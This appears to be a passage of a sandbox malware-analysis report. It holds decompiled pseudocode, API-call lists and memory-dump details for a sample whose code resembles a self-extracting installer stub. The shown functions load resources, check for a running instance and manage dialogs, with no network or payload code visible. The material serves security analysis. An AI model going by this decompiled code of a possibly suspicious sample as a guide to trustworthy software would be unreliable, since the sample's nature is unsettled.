                                                                                                                                                                                                          0x008633d6
                                                                                                                                                                                                          0x008633db
                                                                                                                                                                                                          0x008633dc
                                                                                                                                                                                                          0x008633de
                                                                                                                                                                                                          0x008633df
                                                                                                                                                                                                          0x00863370
                                                                                                                                                                                                          0x00863372
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00863372
                                                                                                                                                                                                          0x008632fc
                                                                                                                                                                                                          0x00863301
                                                                                                                                                                                                          0x00863301
                                                                                                                                                                                                          0x00863303
                                                                                                                                                                                                          0x00863304
                                                                                                                                                                                                          0x00863304
                                                                                                                                                                                                          0x0086330a
                                                                                                                                                                                                          0x0086330d
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00863313
                                                                                                                                                                                                          0x00863318
                                                                                                                                                                                                          0x0086331a
                                                                                                                                                                                                          0x00863331
                                                                                                                                                                                                          0x00863332
                                                                                                                                                                                                          0x0086333a
                                                                                                                                                                                                          0x0086333d
                                                                                                                                                                                                          0x0086337c
                                                                                                                                                                                                          0x00863388
                                                                                                                                                                                                          0x0086338f
                                                                                                                                                                                                          0x00863394
                                                                                                                                                                                                          0x00863396
                                                                                                                                                                                                          0x008633a4
                                                                                                                                                                                                          0x008633ab
                                                                                                                                                                                                          0x008633b6
                                                                                                                                                                                                          0x008633be
                                                                                                                                                                                                          0x008633c3
                                                                                                                                                                                                          0x008633c5
                                                                                                                                                                                                          0x00863435
                                                                                                                                                                                                          0x00863437
                                                                                                                                                                                                          0x00863437
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00863437
                                                                                                                                                                                                          0x008633c7
                                                                                                                                                                                                          0x008633c9
                                                                                                                                                                                                          0x008633cc
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x008633cc
                                                                                                                                                                                                          0x008633ad
                                                                                                                                                                                                          0x008633b4
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x008633b4
                                                                                                                                                                                                          0x00863398
                                                                                                                                                                                                          0x00863399
                                                                                                                                                                                                          0x0086339b
                                                                                                                                                                                                          0x0086339c
                                                                                                                                                                                                          0x0086339d
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0086339d
                                                                                                                                                                                                          0x0086334c
                                                                                                                                                                                                          0x00863351
                                                                                                                                                                                                          0x00863354
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0086335c
                                                                                                                                                                                                          0x00863362
                                                                                                                                                                                                          0x00863364
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00863366
                                                                                                                                                                                                          0x00863367
                                                                                                                                                                                                          0x00863369
                                                                                                                                                                                                          0x0086336a
                                                                                                                                                                                                          0x0086336b
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0086336b
                                                                                                                                                                                                          0x0086331c
                                                                                                                                                                                                          0x00863323
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00863329
                                                                                                                                                                                                          0x0086332b
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0086332b
                                                                                                                                                                                                          0x0086324c
                                                                                                                                                                                                          0x0086324c
                                                                                                                                                                                                          0x0086324f
                                                                                                                                                                                                          0x008632c8
                                                                                                                                                                                                          0x008632ce
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x008632ce
                                                                                                                                                                                                          0x00863251
                                                                                                                                                                                                          0x00863256
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00863271
                                                                                                                                                                                                          0x00863277
                                                                                                                                                                                                          0x00863279
                                                                                                                                                                                                          0x00863298
                                                                                                                                                                                                          0x0086329d
                                                                                                                                                                                                          0x0086329f
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x008632b0
                                                                                                                                                                                                          0x008632b6
                                                                                                                                                                                                          0x008632b8
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x008632be
                                                                                                                                                                                                          0x00863280
                                                                                                                                                                                                          0x00863289
                                                                                                                                                                                                          0x0086328e
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0086328e
                                                                                                                                                                                                          0x0086327b
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0086327b
                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • LoadStringA.USER32(000003E8,00868598,00000200), ref: 00863271
                                                                                                                                                                                                          • GetDesktopWindow.USER32 ref: 008633E2
                                                                                                                                                                                                          • SetWindowTextA.USER32(?,herso), ref: 008633F7
                                                                                                                                                                                                          • SendDlgItemMessageA.USER32(?,00000835,000000C5,00000103,00000000), ref: 00863410
                                                                                                                                                                                                          • GetDlgItem.USER32(?,00000836), ref: 00863426
                                                                                                                                                                                                          • EnableWindow.USER32(00000000), ref: 0086342D
                                                                                                                                                                                                          • EndDialog.USER32(?,00000000), ref: 0086343F
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.461702172.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.461647733.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.461734712.0000000000868000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_860000_W7ANVukbbj.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Window$Item$DesktopDialogEnableLoadMessageSendStringText
                                                                                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$herso
                                                                                                                                                                                                          • API String ID: 2418873061-1350055137
                                                                                                                                                                                                          • Opcode ID: ced26c7dd88deb8194233f698df0042207cf6222bcfa83666cc480a5c4080708
                                                                                                                                                                                                          • Instruction ID: eb8b91f313adf11f9b448b20306f0c01ef9c666bf0eb35d1a761b4c0a459bafa
                                                                                                                                                                                                          • Opcode Fuzzy Hash: ced26c7dd88deb8194233f698df0042207cf6222bcfa83666cc480a5c4080708
                                                                                                                                                                                                          • Instruction Fuzzy Hash: B0513730381240B7FB251B396C8DF7B795DFB56B45F134028F246E63C1CEE88A0196A6
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 93%
                                                                                                                                                                                                          			E00862CAA(struct HINSTANCE__* __ecx, void* __edx, void* __eflags) {
                                                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                                                          				char _v268;
                                                                                                                                                                                                          				void* __ebx;
                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                          				signed int _t13;
                                                                                                                                                                                                          				void* _t20;
                                                                                                                                                                                                          				void* _t23;
                                                                                                                                                                                                          				void* _t27;
                                                                                                                                                                                                          				struct HRSRC__* _t31;
                                                                                                                                                                                                          				intOrPtr _t33;
                                                                                                                                                                                                          				void* _t43;
                                                                                                                                                                                                          				void* _t48;
                                                                                                                                                                                                          				signed int _t65;
                                                                                                                                                                                                          				struct HINSTANCE__* _t66;
                                                                                                                                                                                                          				signed int _t67;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t13 =  *0x868004; // 0xb82e2007
                                                                                                                                                                                                          				_v8 = _t13 ^ _t67;
                                                                                                                                                                                                          				_t65 = 0;
                                                                                                                                                                                                          				_t66 = __ecx;
                                                                                                                                                                                                          				_t48 = __edx;
                                                                                                                                                                                                          				 *0x869a3c = __ecx;
                                                                                                                                                                                                          				memset(0x869140, 0, 0x8fc);
                                                                                                                                                                                                          				memset(0x868a20, 0, 0x32c);
                                                                                                                                                                                                          				memset(0x8688c0, 0, 0x104);
                                                                                                                                                                                                          				 *0x8693ec = 1;
                                                                                                                                                                                                          				_t20 = E0086468F("TITLE", 0x869154, 0x7f);
                                                                                                                                                                                                          				if(_t20 == 0 || _t20 > 0x80) {
                                                                                                                                                                                                          					_t64 = 0x4b1;
                                                                                                                                                                                                          					goto L32;
                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                          					_t27 = CreateEventA(0, 1, 1, 0);
                                                                                                                                                                                                          					 *0x86858c = _t27;
                                                                                                                                                                                                          					SetEvent(_t27);
                                                                                                                                                                                                          					_t64 = 0x869a34;
                                                                                                                                                                                                          					if(E0086468F("EXTRACTOPT", 0x869a34, 4) != 0) {
                                                                                                                                                                                                          						if(( *0x869a34 & 0x000000c0) == 0) {
                                                                                                                                                                                                          							L12:
                                                                                                                                                                                                          							 *0x869120 =  *0x869120 & _t65;
                                                                                                                                                                                                          							if(E00865C9E(_t48, _t48, _t65, _t66) != 0) {
                                                                                                                                                                                                          								if( *0x868a3a == 0) {
                                                                                                                                                                                                          									_t31 = FindResourceA(_t66, "VERCHECK", 0xa);
                                                                                                                                                                                                          									if(_t31 != 0) {
                                                                                                                                                                                                          										_t65 = LoadResource(_t66, _t31);
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          									if( *0x868184 != 0) {
                                                                                                                                                                                                          										__imp__#17();
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          									if( *0x868a24 == 0) {
                                                                                                                                                                                                          										_t57 = _t65;
                                                                                                                                                                                                          										if(E008636EE(_t65) == 0) {
                                                                                                                                                                                                          											goto L33;
                                                                                                                                                                                                          										} else {
                                                                                                                                                                                                          											_t33 =  *0x869a40; // 0x3
                                                                                                                                                                                                          											_t48 = 1;
                                                                                                                                                                                                          											if(_t33 == 1 || _t33 == 2 || _t33 == 3) {
                                                                                                                                                                                                          												if(( *0x869a34 & 0x00000100) == 0 || ( *0x868a38 & 0x00000001) != 0 || E008618A3(_t64, _t66) != 0) {
                                                                                                                                                                                                          													goto L30;
                                                                                                                                                                                                          												} else {
                                                                                                                                                                                                          													_t64 = 0x7d6;
                                                                                                                                                                                                          													if(E00866517(_t57, 0x7d6, _t34, E008619E0, 0x547, 0x83e) != 0x83d) {
                                                                                                                                                                                                          														goto L33;
                                                                                                                                                                                                          													} else {
                                                                                                                                                                                                          														goto L30;
                                                                                                                                                                                                          													}
                                                                                                                                                                                                          												}
                                                                                                                                                                                                          											} else {
                                                                                                                                                                                                          												L30:
                                                                                                                                                                                                          												_t23 = _t48;
                                                                                                                                                                                                          											}
                                                                                                                                                                                                          										}
                                                                                                                                                                                                          									} else {
                                                                                                                                                                                                          										_t23 = 1;
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                          									E00862390(0x868a3a);
                                                                                                                                                                                                          									goto L33;
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                          								_t64 = 0x520;
                                                                                                                                                                                                          								L32:
                                                                                                                                                                                                          								E008644B9(0, _t64, 0, 0, 0x10, 0);
                                                                                                                                                                                                          								goto L33;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                          							_t64 =  &_v268;
                                                                                                                                                                                                          							if(E0086468F("INSTANCECHECK",  &_v268, 0x104) == 0) {
                                                                                                                                                                                                          								goto L3;
                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                          								_t43 = CreateMutexA(0, 1,  &_v268);
                                                                                                                                                                                                          								 *0x868588 = _t43;
                                                                                                                                                                                                          								if(_t43 == 0 || GetLastError() != 0xb7) {
                                                                                                                                                                                                          									goto L12;
                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                          									if(( *0x869a34 & 0x00000080) == 0) {
                                                                                                                                                                                                          										_t64 = 0x524;
                                                                                                                                                                                                          										if(E008644B9(0, 0x524, ?str?, 0, 0x20, 4) == 6) {
                                                                                                                                                                                                          											goto L12;
                                                                                                                                                                                                          										} else {
                                                                                                                                                                                                          											goto L11;
                                                                                                                                                                                                          										}
                                                                                                                                                                                                          									} else {
                                                                                                                                                                                                          										_t64 = 0x54b;
                                                                                                                                                                                                          										E008644B9(0, 0x54b, "herso", 0, 0x10, 0);
                                                                                                                                                                                                          										L11:
                                                                                                                                                                                                          										CloseHandle( *0x868588);
                                                                                                                                                                                                          										 *0x869124 = 0x800700b7;
                                                                                                                                                                                                          										goto L33;
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                          						L3:
                                                                                                                                                                                                          						_t64 = 0x4b1;
                                                                                                                                                                                                          						E008644B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                          						 *0x869124 = 0x80070714;
                                                                                                                                                                                                          						L33:
                                                                                                                                                                                                          						_t23 = 0;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				return E00866CE0(_t23, _t48, _v8 ^ _t67, _t64, _t65, _t66);
                                                                                                                                                                                                          			}



















                                                                                                                                                                                                          0x00862cb5
                                                                                                                                                                                                          0x00862cbc
                                                                                                                                                                                                          0x00862cc7
                                                                                                                                                                                                          0x00862cc9
                                                                                                                                                                                                          0x00862cd1
                                                                                                                                                                                                          0x00862cd3
                                                                                                                                                                                                          0x00862cd9
                                                                                                                                                                                                          0x00862ce9
                                                                                                                                                                                                          0x00862cf9
                                                                                                                                                                                                          0x00862d0e
                                                                                                                                                                                                          0x00862d15
                                                                                                                                                                                                          0x00862d1c
                                                                                                                                                                                                          0x00862ef3
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00862d2d
                                                                                                                                                                                                          0x00862d34
                                                                                                                                                                                                          0x00862d3b
                                                                                                                                                                                                          0x00862d40
                                                                                                                                                                                                          0x00862d48
                                                                                                                                                                                                          0x00862d59
                                                                                                                                                                                                          0x00862d84
                                                                                                                                                                                                          0x00862e1f
                                                                                                                                                                                                          0x00862e1f
                                                                                                                                                                                                          0x00862e2e
                                                                                                                                                                                                          0x00862e41
                                                                                                                                                                                                          0x00862e5a
                                                                                                                                                                                                          0x00862e62
                                                                                                                                                                                                          0x00862e6c
                                                                                                                                                                                                          0x00862e6c
                                                                                                                                                                                                          0x00862e75
                                                                                                                                                                                                          0x00862e77
                                                                                                                                                                                                          0x00862e77
                                                                                                                                                                                                          0x00862e84
                                                                                                                                                                                                          0x00862e8b
                                                                                                                                                                                                          0x00862e94
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00862e96
                                                                                                                                                                                                          0x00862e96
                                                                                                                                                                                                          0x00862e9e
                                                                                                                                                                                                          0x00862ea2
                                                                                                                                                                                                          0x00862eba
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00862ece
                                                                                                                                                                                                          0x00862ede
                                                                                                                                                                                                          0x00862eed
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00862eed
                                                                                                                                                                                                          0x00862eef
                                                                                                                                                                                                          0x00862eef
                                                                                                                                                                                                          0x00862eef
                                                                                                                                                                                                          0x00862eef
                                                                                                                                                                                                          0x00862ea2
                                                                                                                                                                                                          0x00862e86
                                                                                                                                                                                                          0x00862e88
                                                                                                                                                                                                          0x00862e88
                                                                                                                                                                                                          0x00862e43
                                                                                                                                                                                                          0x00862e48
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00862e48
                                                                                                                                                                                                          0x00862e30
                                                                                                                                                                                                          0x00862e30
                                                                                                                                                                                                          0x00862ef8
                                                                                                                                                                                                          0x00862f01
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00862f01
                                                                                                                                                                                                          0x00862d8a
                                                                                                                                                                                                          0x00862d8f
                                                                                                                                                                                                          0x00862da1
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00862da3
                                                                                                                                                                                                          0x00862dae
                                                                                                                                                                                                          0x00862db4
                                                                                                                                                                                                          0x00862dbb
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00862dca
                                                                                                                                                                                                          0x00862dd3
                                                                                                                                                                                                          0x00862df5
                                                                                                                                                                                                          0x00862e02
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00862dd5
                                                                                                                                                                                                          0x00862dde
                                                                                                                                                                                                          0x00862de3
                                                                                                                                                                                                          0x00862e04
                                                                                                                                                                                                          0x00862e0a
                                                                                                                                                                                                          0x00862e10
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00862e10
                                                                                                                                                                                                          0x00862dd3
                                                                                                                                                                                                          0x00862dbb
                                                                                                                                                                                                          0x00862da1
                                                                                                                                                                                                          0x00862d5b
                                                                                                                                                                                                          0x00862d5b
                                                                                                                                                                                                          0x00862d5d
                                                                                                                                                                                                          0x00862d69
                                                                                                                                                                                                          0x00862d6e
                                                                                                                                                                                                          0x00862f06
                                                                                                                                                                                                          0x00862f06
                                                                                                                                                                                                          0x00862f06
                                                                                                                                                                                                          0x00862d59
                                                                                                                                                                                                          0x00862f18

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • memset.MSVCRT ref: 00862CD9
                                                                                                                                                                                                          • memset.MSVCRT ref: 00862CE9
                                                                                                                                                                                                          • memset.MSVCRT ref: 00862CF9
                                                                                                                                                                                                            • Part of subcall function 0086468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 008646A0
                                                                                                                                                                                                            • Part of subcall function 0086468F: SizeofResource.KERNEL32(00000000,00000000,?,00862D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 008646A9
                                                                                                                                                                                                            • Part of subcall function 0086468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 008646C3
                                                                                                                                                                                                            • Part of subcall function 0086468F: LoadResource.KERNEL32(00000000,00000000,?,00862D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 008646CC
                                                                                                                                                                                                            • Part of subcall function 0086468F: LockResource.KERNEL32(00000000,?,00862D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 008646D3
                                                                                                                                                                                                            • Part of subcall function 0086468F: memcpy_s.MSVCRT ref: 008646E5
                                                                                                                                                                                                            • Part of subcall function 0086468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 008646EF
                                                                                                                                                                                                          • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00862D34
                                                                                                                                                                                                          • SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,00000002,00000000), ref: 00862D40
                                                                                                                                                                                                          • CreateMutexA.KERNEL32(00000000,00000001,?,00000104,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 00862DAE
                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 00862DBD
                                                                                                                                                                                                          • CloseHandle.KERNEL32(herso,00000000,00000020,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 00862E0A
                                                                                                                                                                                                            • Part of subcall function 008644B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00864518
                                                                                                                                                                                                            • Part of subcall function 008644B9: MessageBoxA.USER32(?,?,herso,00010010), ref: 00864554
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.461702172.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.461647733.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.461734712.0000000000868000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_860000_W7ANVukbbj.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Resource$memset$CreateEventFindLoad$CloseErrorFreeHandleLastLockMessageMutexSizeofStringmemcpy_s
                                                                                                                                                                                                          • String ID: EXTRACTOPT$INSTANCECHECK$TITLE$VERCHECK$herso
                                                                                                                                                                                                          • API String ID: 1002816675-4197546956
                                                                                                                                                                                                          • Opcode ID: ae92c140c9e94043d804745d32a5662875ff925d0ebc503b33816c09dcc30fea
                                                                                                                                                                                                          • Instruction ID: 69e2d8836d28011eb6eb59eb5ab9133105790ba16fe455229e14f94dd791c9c1
                                                                                                                                                                                                          • Opcode Fuzzy Hash: ae92c140c9e94043d804745d32a5662875ff925d0ebc503b33816c09dcc30fea
                                                                                                                                                                                                          • Instruction Fuzzy Hash: F4512670240B01AAEB24A7649C1AB3B369DFB51711F075075F986D62D2EFF98841CB23
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 81%
                                                                                                                                                                                                          			E008634F0(struct HWND__* _a4, intOrPtr _a8, int _a12) {
                                                                                                                                                                                                          				void* _t9;
                                                                                                                                                                                                          				void* _t12;
                                                                                                                                                                                                          				void* _t13;
                                                                                                                                                                                                          				void* _t17;
                                                                                                                                                                                                          				void* _t23;
                                                                                                                                                                                                          				void* _t25;
                                                                                                                                                                                                          				struct HWND__* _t35;
                                                                                                                                                                                                          				struct HWND__* _t38;
                                                                                                                                                                                                          				void* _t39;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t9 = _a8 - 0x10;
                                                                                                                                                                                                          				if(_t9 == 0) {
                                                                                                                                                                                                          					__eflags = 1;
                                                                                                                                                                                                          					L19:
                                                                                                                                                                                                          					_push(0);
                                                                                                                                                                                                          					 *0x8691d8 = 1;
                                                                                                                                                                                                          					L20:
                                                                                                                                                                                                          					_push(_a4);
                                                                                                                                                                                                          					L21:
                                                                                                                                                                                                          					EndDialog();
                                                                                                                                                                                                          					L22:
                                                                                                                                                                                                          					return 1;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				_push(1);
                                                                                                                                                                                                          				_pop(1);
                                                                                                                                                                                                          				_t12 = _t9 - 0xf2;
                                                                                                                                                                                                          				if(_t12 == 0) {
                                                                                                                                                                                                          					__eflags = _a12 - 0x1b;
                                                                                                                                                                                                          					if(_a12 != 0x1b) {
                                                                                                                                                                                                          						goto L22;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					goto L19;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				_t13 = _t12 - 0xe;
                                                                                                                                                                                                          				if(_t13 == 0) {
                                                                                                                                                                                                          					_t35 = _a4;
                                                                                                                                                                                                          					 *0x868584 = _t35;
                                                                                                                                                                                                          					E008643D0(_t35, GetDesktopWindow());
                                                                                                                                                                                                          					__eflags =  *0x868184; // 0x1
                                                                                                                                                                                                          					if(__eflags != 0) {
                                                                                                                                                                                                          						SendMessageA(GetDlgItem(_t35, 0x83b), 0x464, 0, 0xbb9);
                                                                                                                                                                                                          						SendMessageA(GetDlgItem(_t35, 0x83b), 0x465, 0xffffffff, 0xffff0000);
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					SetWindowTextA(_t35, "herso");
                                                                                                                                                                                                          					_t17 = CreateThread(0, 0, E00864FE0, 0, 0, 0x868798);
                                                                                                                                                                                                          					 *0x86879c = _t17;
                                                                                                                                                                                                          					__eflags = _t17;
                                                                                                                                                                                                          					if(_t17 != 0) {
                                                                                                                                                                                                          						goto L22;
                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                          						E008644B9(_t35, 0x4b8, 0, 0, 0x10, 0);
                                                                                                                                                                                                          						_push(0);
                                                                                                                                                                                                          						_push(_t35);
                                                                                                                                                                                                          						goto L21;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				_t23 = _t13 - 1;
                                                                                                                                                                                                          				if(_t23 == 0) {
                                                                                                                                                                                                          					__eflags = _a12 - 2;
                                                                                                                                                                                                          					if(_a12 != 2) {
                                                                                                                                                                                                          						goto L22;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					ResetEvent( *0x86858c);
                                                                                                                                                                                                          					_t38 =  *0x868584; // 0x0
                                                                                                                                                                                                          					_t25 = E008644B9(_t38, 0x4b2, 0x861140, 0, 0x20, 4);
                                                                                                                                                                                                          					__eflags = _t25 - 6;
                                                                                                                                                                                                          					if(_t25 == 6) {
                                                                                                                                                                                                          						L11:
                                                                                                                                                                                                          						 *0x8691d8 = 1;
                                                                                                                                                                                                          						SetEvent( *0x86858c);
                                                                                                                                                                                                          						_t39 =  *0x86879c; // 0x0
                                                                                                                                                                                                          						E00863680(_t39);
                                                                                                                                                                                                          						_push(0);
                                                                                                                                                                                                          						goto L20;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					__eflags = _t25 - 1;
                                                                                                                                                                                                          					if(_t25 == 1) {
                                                                                                                                                                                                          						goto L11;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					SetEvent( *0x86858c);
                                                                                                                                                                                                          					goto L22;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				if(_t23 == 0xe90) {
                                                                                                                                                                                                          					TerminateThread( *0x86879c, 0);
                                                                                                                                                                                                          					EndDialog(_a4, _a12);
                                                                                                                                                                                                          					return 1;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				return 0;
                                                                                                                                                                                                          			}












                                                                                                                                                                                                          0x008634fb
                                                                                                                                                                                                          0x008634fe
                                                                                                                                                                                                          0x00863665
                                                                                                                                                                                                          0x00863666
                                                                                                                                                                                                          0x00863666
                                                                                                                                                                                                          0x00863668
                                                                                                                                                                                                          0x0086366e
                                                                                                                                                                                                          0x0086366e
                                                                                                                                                                                                          0x00863671
                                                                                                                                                                                                          0x00863671
                                                                                                                                                                                                          0x00863677
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00863677
                                                                                                                                                                                                          0x00863504
                                                                                                                                                                                                          0x00863506
                                                                                                                                                                                                          0x00863507
                                                                                                                                                                                                          0x0086350c
                                                                                                                                                                                                          0x0086365b
                                                                                                                                                                                                          0x0086365f
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00863661
                                                                                                                                                                                                          0x00863512
                                                                                                                                                                                                          0x00863515
                                                                                                                                                                                                          0x008635be
                                                                                                                                                                                                          0x008635c1
                                                                                                                                                                                                          0x008635d1
                                                                                                                                                                                                          0x008635d8
                                                                                                                                                                                                          0x008635de
                                                                                                                                                                                                          0x008635f8
                                                                                                                                                                                                          0x00863617
                                                                                                                                                                                                          0x00863617
                                                                                                                                                                                                          0x00863623
                                                                                                                                                                                                          0x00863637
                                                                                                                                                                                                          0x0086363d
                                                                                                                                                                                                          0x00863642
                                                                                                                                                                                                          0x00863644
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00863646
                                                                                                                                                                                                          0x00863652
                                                                                                                                                                                                          0x00863657
                                                                                                                                                                                                          0x00863658
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00863658
                                                                                                                                                                                                          0x00863644
                                                                                                                                                                                                          0x0086351b
                                                                                                                                                                                                          0x0086351d
                                                                                                                                                                                                          0x0086354f
                                                                                                                                                                                                          0x00863553
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0086355f
                                                                                                                                                                                                          0x00863565
                                                                                                                                                                                                          0x0086357c
                                                                                                                                                                                                          0x00863581
                                                                                                                                                                                                          0x00863584
                                                                                                                                                                                                          0x0086359b
                                                                                                                                                                                                          0x008635a1
                                                                                                                                                                                                          0x008635a7
                                                                                                                                                                                                          0x008635ad
                                                                                                                                                                                                          0x008635b3
                                                                                                                                                                                                          0x008635b8
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x008635b8
                                                                                                                                                                                                          0x00863586
                                                                                                                                                                                                          0x00863588
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00863590
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00863590
                                                                                                                                                                                                          0x00863524
                                                                                                                                                                                                          0x00863535
                                                                                                                                                                                                          0x00863541
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00863549
                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • TerminateThread.KERNEL32(00000000), ref: 00863535
                                                                                                                                                                                                          • EndDialog.USER32(?,?), ref: 00863541
                                                                                                                                                                                                          • ResetEvent.KERNEL32 ref: 0086355F
